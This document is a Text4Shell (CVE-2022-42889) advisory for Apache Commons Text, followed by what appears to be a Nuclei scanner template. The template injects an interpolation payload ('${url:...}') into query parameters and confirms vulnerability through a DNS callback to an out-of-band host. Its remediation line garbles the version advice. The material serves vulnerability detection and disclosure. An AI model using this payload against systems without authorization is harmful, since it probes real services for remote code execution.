Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
PoC代码[已公开]
id: CVE-2022-42889
info:
name: Text4Shell - Remote Code Execution
author: mordavid,princechaddha
severity: critical
description: |
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0.
reference:
- https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om
- http://www.openwall.com/lists/oss-security/2022/10/13/4
- http://www.openwall.com/lists/oss-security/2022/10/18/1
- https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/
- https://github.com/silentsignal/burp-text4shell
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-42889
cwe-id: CWE-94
epss-score: 0.94161
epss-percentile: 0.99911
metadata:
max-request: 1
confidence: tenative
tags: cve,cve2022,rce,oast,text4shell,dast
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
text4shell:
- "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}"
fuzzing:
- part: query
fuzz:
- "{{text4shell}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: regex
part: interactsh_request
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
extractors:
- type: kval
kval:
- interactsh_ip # Print remote interaction IP in output
- type: regex
part: interactsh_request
group: 2
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
- type: regex
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# digest: 490a00463044021f705d9bbe7626bf4ab115f0c046d51a474ff2a22a132a4d754375a2b64f105a022100dcda6b7c00934574644b4c1be476d893c3ae3b02f85bb5bb4db62bf16cd0fe43:922c64590222798bb761d5b6d8e72950